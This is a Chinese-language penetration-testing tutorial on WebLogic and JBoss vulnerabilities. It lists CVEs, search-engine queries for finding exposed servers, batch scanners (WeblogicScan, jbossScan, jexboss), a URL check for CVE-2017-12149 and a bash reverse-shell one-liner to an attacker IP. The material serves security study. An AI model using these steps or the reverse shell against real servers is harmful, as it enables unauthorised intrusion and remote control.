当前位置: 首页 > news >正文

网安系列【16】之Weblogic和jboss漏洞

文章目录

  • 一 Weblogic
    • 1.1 Weblogic相关漏洞
    • 1.2 Weblogic漏洞发现
    • 1.3 Weblogic漏洞利用
  • 二 Jboss
    • 2.1 Jboss漏洞
    • 2.2 Jboss识别与漏洞利用

一 Weblogic

  • WebLogic 是由 Oracle公司 开发的一款基于Java EE(现称Jakarta EE)的企业级应用服务器,主要用于部署、运行和管理分布式Web应用、企业应用和微服务。
  • 优势:成熟稳定,适合大规模关键业务、深度集成Oracle数据库及其他中间件(如SOA Suite)。
    劣势:配置复杂,学习曲线陡峭、资源占用较高,成本昂贵(相比开源替代品如WildFly/TomEE)。
    在这里插入图片描述

1.1 Weblogic相关漏洞

在这里插入图片描述


主要受影响版本:
Weblogic 10.3.6.0
Weblogic 12.1.3.0
Weblogic 12.2.1.1
Weblogic 12.2.1.2
Weblogic 12.2.1.3
Weblogic 14.1.1.0


  • 弱口令:Weblogic存在管理后台,通过账号密码登录,由于管理员的疏忽,经常会使用弱口令,或者默认的账户名密码。
  • SSRF漏洞(CVE-2014-4210):Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而可以攻 击内网中redis、fastcgi等脆弱组件。
  • SSRF(Server-Side Request Forgery,服务器端请求伪造)。SSRF是一种安全漏洞,攻击者诱使服务器向内部或外部的非预期系统发起恶意请求,从而绕过访问控制、探测内网或攻击其他服务。
  • 漏洞原理
    1. 攻击者控制目标服务器的请求目标:通过篡改URL、参数或文件上传等功能,让服务器代替攻击者访问内网资源、第三方系统或敏感接口。
    2. 服务器的高权限:服务器通常能访问内网(如数据库、管理后台),而外部用户无法直接到达这些资源。
  • 任意文件上传漏洞 (CVE-2018-2894):Web ServiceTestPage 在"生产模式”下默认不开启,所以该漏洞有一定限制。“利用该漏洞,可以上传任意jsp文件,进而获取服务器权限。
  • XML Dec0der反序列化漏洞(CVE-2017-10271):Weblogic的WLSSecurity组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。
  • Java反序列化漏洞(CVE-2018-2628):Oracle 2018年4月补丁中,修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞(CVE-2018-2628),该漏洞通过t3协议触发,可导致未授 权的用户在远程服务器执行任意命令。

1.2 Weblogic漏洞发现

  1. 获取资产:shodan、fofa、钟馗之眼等,app="BEA-WebLogic-Server"。 google hackhing inurl:漏洞地址intitle:weblogic等。
  2. 批量扫描脚本:WeblogicScan。
  3. 漏洞路径:_async/AsyncResponseService
    在这里插入图片描述
    在这里插入图片描述

1.3 Weblogic漏洞利用


验证扫描结果(执行命令and反弹shell)

  • 执行扫描命令python3 WeblogicScan -f target.txt,然后利用Java反序列化漏洞利用工具,选择发现的漏洞类型和服务器的地址,进行检查,即可实现命令执行。
    在这里插入图片描述
    在这里插入图片描述
  • 反弹shell
bash -i >& /dev/tcp/ip/port 0>&1

在这里插入图片描述

二 Jboss

  • JBoss(现称 WildFly)是一款开源的、基于Java EE(现Jakarta EE)的应用服务器,由Red Hat公司开发和维护。它用于部署和管理企业级Java应用(如Web服务、分布式系统等),提供高性能、模块化架构和丰富的企业功能。
组件功能说明
Undertow高性能Web服务器(默认替代Tomcat),支持HTTP/2和WebSocket。
Hibernate集成ORM框架,简化数据库操作。
Infinispan分布式缓存系统,用于集群会话共享。
Arquillian测试框架,支持容器内自动化测试。
Management Console Web管理界面(默认端口9990),监控和配置服务器。

2.1 Jboss漏洞


Jboss历史漏洞 (反序列化漏洞)

  • JBoss JMXlnvokerServlet 反序列化漏洞 (CVE-2015-7501)
  • JBossEJBlnvokerServlet反序列化漏洞
  • JBosS AS 6.X 反序列化漏洞(CVE-2017-12149)
  • JBoss 4.xJBossMQJMS 反序列化漏洞(CVE-2017-7504)

Jboss历史漏洞 (访问控制不严导致的漏洞)

  • JMXConsole未授权访问Getshell
  • JMX Console HtmlAdaptor Getshell (CVE-2007-1036)
  • JMX控制台安全验证绕过漏洞(CVE-2010-0738) Administration
  • Console 弱口令 Getshell

2.2 Jboss识别与漏洞利用

  1. Jboss漏洞检测(批量):jbossScan
    在这里插入图片描述
  • CVE-2017-12149漏洞检测:http://ip:8080/invoker/readonly访问该url,若显示状态码为500的报错界面,则证明漏洞存在。
  • CVE-2017-12149漏洞概述:该漏洞为 Java反序列化错误类型,存在于 Jboss 的 Httplnvoker 组件中ReadOnlyAccessFilter过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。
  • CVE-2017-12149漏洞利用(反弹shell):工具https://github.com/joaomatosf/jexboss。
http://www.dtcms.com/a/271776.html

相关文章:

  • 深入剖析 ADL:C++ 中的依赖查找机制及其编译错误案例分析
  • 短剧分销系统开发指南:从0到1构建高效变现平台
  • 基于双向cuk斩波均衡电路的串联锂离子均衡系统设计
  • 文心一言4.5开源部署指南及文学领域测评
  • frp内网穿透下创建FTP(解决FTP“服务器回应不可路由的地址。使用服务器地址替代”错误)
  • 【macos用镜像站体验】Claude Code入门使用教程和常用命令
  • JS实现页面实时时间显示/倒计时
  • SMTPman,smtp的端口号是多少全面解析配置
  • 【数据结构】时间复杂度和空间复杂度
  • 杰赛S65_中星微ZX296716免拆刷机教程解决网络错误和时钟问题
  • Java线程池原理概述
  • 浏览器 实时监听音量 实时语音识别 vue js
  • 解析LLM层裁剪:Qwen实战指南
  • 搭建自动化工作流:探寻解放双手的有效方案(1)
  • Spring Boot项目中大文件上传的高级实践与性能优化
  • Spring for Apache Pulsar->Reactive Support->Message Consumption
  • Socket服务器代理工具及服务端网络转发中枢
  • 【Action帧简要分析】
  • iOS APP混合开发性能测试怎么做?页面卡顿、通信异常的工具组合实战
  • iOS Widget 开发-7:TimelineProvider 机制全解析:构建未来时间线
  • 在 MacOS 上安装和配置 Kafka
  • 深入理解 Linux 中的 stat 函数与文件属性操作
  • 每天一个前端小知识 Day 29 - WebGL / WebGPU 数据可视化引擎设计与实践
  • 在Linux上使用libasan开发QT程序定位内存问题
  • Spring AI 系列之七 - MCP Client
  • 限流式保护器如何筑牢无人驾驶汽车充电站的安全防线
  • linxu内核的signal fault和arm内核的flault
  • 【LeetCode100】--- 2.字母异位词分组【复习回顾】
  • 如何发现 Redis 中的 BigKey?
  • 正向代理服务器Squid:功能、架构、部署与应用深度解析